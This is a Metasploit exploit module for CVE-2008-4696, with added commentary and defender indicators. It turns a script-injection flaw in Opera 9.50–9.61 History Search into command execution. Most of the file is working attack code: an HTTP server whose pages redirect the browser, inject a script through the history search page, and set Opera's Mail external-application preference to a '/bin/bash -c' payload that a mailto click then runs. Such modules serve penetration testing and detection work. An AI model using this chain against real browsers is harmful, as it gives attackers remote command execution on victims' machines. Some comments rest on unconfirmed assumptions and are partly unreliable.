GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/multi/browser/opera_historysearch.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# Metasploit browser-exploit module for CVE-2008-4696. Per the Description
# below, Opera's History Search results (opera:historysearch) do not escape
# certain constructs, so script injected into that page can reach the
# opera:config preferences and turn a configuration change into command
# execution. The module runs a small HTTP server that answers three URI
# shapes on its resource path and returns 404 for everything else
# (see on_request_uri).
#
# Defender notes (every string quoted here appears verbatim in this file):
# - Affected versions per the Description are Opera 9.50 through 9.61; the
#   vendor KB article listed under 'References' covers the fix.
# - Network indicators: requests to the resource path carrying "?history" or
#   "?jspayload=1", and responses containing "opera:historysearch?q=*",
#   "opera:config" or "opera.setPreference('Mail',".
# - Host indicator for the only active target: the served script launches
#   the payload via "/bin/bash -c", i.e. a shell spawned by the browser.
#
# Names used without a definition here (Msf::Exploit::Remote, ExcellentRanking,
# BSD_LICENSE, ARCH_CMD, the UNKNOWN_* constants, update_info,
# regenerate_payload, send_response_html, send_not_found, get_resource,
# print_status, handler, Rex::Text) come from the Metasploit framework and
# the mixin included below.
class MetasploitModule < Msf::Exploit::Remote
  # Framework reliability ranking for this module.
  Rank = ExcellentRanking

  # HTTP server mixin; on_request_uri below is its per-request callback.
  include Msf::Exploit::Remote::HttpServer::HTML

  # BrowserAutopwn registration is switched off. The version test it would
  # have run (9.5 < v < 9.62) agrees with the 9.50-9.61 range stated in the
  # Description.
  # include Msf::Exploit::Remote::BrowserAutopwn
  # autopwn_info({
  # :ua_name => HttpClients::OPERA,
  # :javascript => true,
  # :rank => ExcellentRanking, # reliable command execution
  # :vuln_test => %Q{
  # v = parseFloat(opera.version());
  # if (9.5 < v && 9.62 > v) {
  # is_vuln = true;
  # }
  # },
  # })

  # Registers the module's metadata with the framework.
  #
  # @param info [Hash] metadata overrides, merged in by update_info
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Opera historysearch XSS',
        'Description' => %q{
          Certain constructs are not escaped correctly by Opera's History
          Search results. These can be used to inject scripts into the
          page, which can then be used to modify configuration settings
          and execute arbitrary commands. Affects Opera versions between
          9.50 and 9.61.
        },
        'License' => BSD_LICENSE,
        'Author' => [
          'Roberto Suggi', # Discovered the vulnerability
          'Aviv Raff <avivra[at]gmail.com>', # showed it to be exploitable for code exec
          'egypt', # msf module
        ],
        'References' => [
          ['CVE', '2008-4696'],
          ['OSVDB', '49472'],
          ['BID', '31869'],
          ['URL', 'http://www.opera.com/support/kb/view/903/'],
        ],
        # Constraints handed to the payload generator. Only command-type
        # payloads are accepted; the four excluded bytes are tab, LF, CR and
        # space. The reason for the exclusions is not stated here (the
        # command is hex-encoded before being embedded, see on_request_uri)
        # - TODO confirm.
        'Payload' => {
          'EXITFUNC' => 'process',
          'Space' => 4000,
          'DisableNops' => true,
          'BadChars' => "\x09\x0a\x0d\x20",
          'Compat' =>
          {
            'PayloadType' => 'cmd',
            'RequiredCmd' => 'generic perl ruby telnet'
          }
        },
        # Only the Unix command target is active; the 'Automatic' and Windows
        # entries are left commented out.
        'Targets' => [
          # [ 'Automatic', { } ],
          # [ 'Opera < 9.61 Windows',
          # {
          # 'Platform' => 'win',
          # 'Arch' => ARCH_X86,
          # }
          # ],
          [
            'Opera < 9.61 Unix Cmd',
            {
              'Platform' => 'unix',
              'Arch' => ARCH_CMD
            }
          ],
        ],
        'DisclosureDate' => '2008-10-23', # Date of full-disclosure post showing code exec
        'DefaultTarget' => 0,
        # Reliability, stability and side-effect notes were never filled in.
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )
  end

  # Per-request callback of the HTTP server mixin. The response is chosen by
  # matching request.uri, in this order:
  #   "?jspayload"  - script that embeds an iframe on opera:config and,
  #                   through eval in that frame, temporarily points the
  #                   Mail 'External Application' preference at the payload
  #                   command, clicks a mailto: link so the handler runs it,
  #                   then restores both preferences and moves the window
  #                   to about:blank.
  #   "?history"    - page whose onload navigates to
  #                   opera:historysearch?q=*. Presumably the entry just
  #                   added to the history (fragment included) is then
  #                   rendered unescaped in the results, which is the flaw
  #                   the Description refers to - confirm against the
  #                   references.
  #   resource path - landing page; from the top-level window it redirects
  #                   to "?history#<script src='...?jspayload=1'/><!--".
  #                   Because the two regex branches are tested first, this
  #                   branch only ever sees the bare resource path.
  #   anything else - 404.
  #
  # @param cli     [Object] connected client, passed to the framework helpers
  # @param request [Object] parsed request; only request.uri is read
  # @return [void]
  def on_request_uri(cli, request)
    # No additional response headers.
    headers = {}
    # Shared HTML shell; the literals' leading indentation is stripped
    # before the response is sent (see the gsub! calls at the end).
    html_hdr = %(
      <html>
      <head>
      <title>Loading</title>
    )
    html_ftr = %(
      </head>
      <body >
      <h1>Loading</h1>
      </body></html>
    )

    case request.uri
    when /[?]jspayload/
      # Fresh payload for this client; nothing to serve if generation fails.
      p = regenerate_payload(cli)
      if (p.nil?)
        send_not_found(cli)
        return
      end
      # We're going to run this through unescape(), so make sure
      # everything is encoded
      penc = Rex::Text.to_hex(p.encoded, '%')
      # Served as the body of the <script src=...?jspayload=1> reference the
      # landing page injects. "config_window" is reached as a global name,
      # which presumably relies on Opera exposing the iframe by its id -
      # confirm. The eval'd string saves the two Mail preferences, replaces
      # them, fires the mailto: click, and schedules their restoration.
      content =
        %{
          var s = document.createElement("iframe");

          s.src="opera:config";
          s.id="config_window";
          document.body.appendChild(s);
          config_window.eval(
          "var cmd = unescape('/bin/bash -c %22#{penc}%22 ');" +
          "old_app = opera.getPreference('Mail','External Application');" +
          "old_handler = opera.getPreference('Mail','Handler');" +
          "opera.setPreference('Mail','External Application',cmd);" +
          "opera.setPreference('Mail','Handler','2');" +
          "app_link = document.createElement('a');" +
          "app_link.setAttribute('href', 'mailto:[email protected]');" +
          "app_link.click();" +
          "setTimeout(function () {opera.setPreference('Mail','External Application',old_app)},0);" +
          "setTimeout(function () {opera.setPreference('Mail','Handler',old_handler)},0);" +
          "");
          setTimeout(function () {window.location='about:blank'},1);
        }

    when /[?]history/
      # Send the browser to the History Search page for every entry ("*").
      js = %^
        window.onload = function() {
          location.href = "opera:historysearch?q=*";
        }
      ^
      content = %(
        #{html_hdr}
        <script><!--
        #{js}
        //--></script>
        #{html_ftr}
      )
    when get_resource
      print_status("Sending #{name} for request #{request.uri}")

      # Opera only: climb to the top-level window and navigate it to the
      # "?history" page with the script reference in the URL fragment.
      js = %^
        if (window.opera) {
          var wnd = window;
          while (wnd.parent != wnd) {
            wnd = wnd.parent;
          }
          url = location.href;
          wnd.location = url + "?history#<script src='" + url +"?" + "jspayload=1'/><!--";
        }
      ^
      content = %(
        #{html_hdr}
        <script><!--
        #{js}
        //--></script>
        #{html_ftr}
      )
    else
      print_status("Sending 404 for request #{request.uri}")
      send_not_found(cli)
      return
    end
    # Drop up to eight leading spaces of source indentation from each line
    # and flatten tabs so the served markup does not carry Ruby indentation.
    content.gsub!(/^ {8}/, '')
    content.gsub!(/\t/, ' ')

    send_response_html(cli, content, headers)
    # Framework hook: give the payload handler a chance to act on this client.
    handler(cli)
  end
end